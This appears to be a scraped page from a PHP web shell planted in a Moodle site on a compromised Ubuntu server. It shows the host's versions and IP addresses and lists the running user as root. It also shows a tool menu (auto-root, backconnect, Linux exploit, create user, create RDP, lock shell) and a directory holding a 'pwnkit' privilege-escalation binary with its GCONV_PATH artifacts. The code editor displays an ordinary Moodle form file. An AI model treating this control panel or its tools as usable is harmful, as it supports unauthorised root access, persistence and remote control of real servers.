Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
user /
filters /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
checkbox.php
4.68
KB
-rwxrwxrwx
cohort.php
4.54
KB
-rwxrwxrwx
courserole.php
5.27
KB
-rwxrwxrwx
date.php
3.24
KB
-rwxrwxrwx
globalrole.php
2.57
KB
-rwxrwxrwx
lib.php
11.52
KB
-rwxrwxrwx
profilefield.php
6.73
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
select.php
3.9
KB
-rwxrwxrwx
simpleselect.php
2.57
KB
-rwxrwxrwx
text.php
5.05
KB
-rwxrwxrwx
user_filter_forms.php
2.35
KB
-rwxrwxrwx
yesno.php
1.04
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user_filter_forms.php
<?php require_once($CFG->libdir.'/formslib.php'); class user_add_filter_form extends moodleform { function definition() { $mform =& $this->_form; $fields = $this->_customdata['fields']; $extraparams = $this->_customdata['extraparams']; $mform->addElement('header', 'newfilter', get_string('newfilter','filters')); foreach($fields as $ft) { $ft->setupForm($mform); } // in case we wasnt to track some page params if ($extraparams) { foreach ($extraparams as $key=>$value) { $mform->addElement('hidden', $key, $value); $mform->setType($key, PARAM_RAW); } } // Add button $mform->addElement('submit', 'addfilter', get_string('addfilter','filters')); } } class user_active_filter_form extends moodleform { function definition() { global $SESSION; // this is very hacky :-( $mform =& $this->_form; $fields = $this->_customdata['fields']; $extraparams = $this->_customdata['extraparams']; if (!empty($SESSION->user_filtering)) { // add controls for each active filter in the active filters group $mform->addElement('header', 'actfilterhdr', get_string('actfilterhdr','filters')); foreach ($SESSION->user_filtering as $fname=>$datas) { if (!array_key_exists($fname, $fields)) { continue; // filter not used } $field = $fields[$fname]; foreach($datas as $i=>$data) { $description = $field->get_label($data); $mform->addElement('checkbox', 'filter['.$fname.']['.$i.']', null, $description); } } if ($extraparams) { foreach ($extraparams as $key=>$value) { $mform->addElement('hidden', $key, $value); $mform->setType($key, PARAM_RAW); } } $objs = array(); $objs[] = &$mform->createElement('submit', 'removeselected', get_string('removeselected','filters')); $objs[] = &$mform->createElement('submit', 'removeall', get_string('removeall','filters')); $mform->addElement('group', 'actfiltergrp', '', $objs, ' ', false); } } }
Close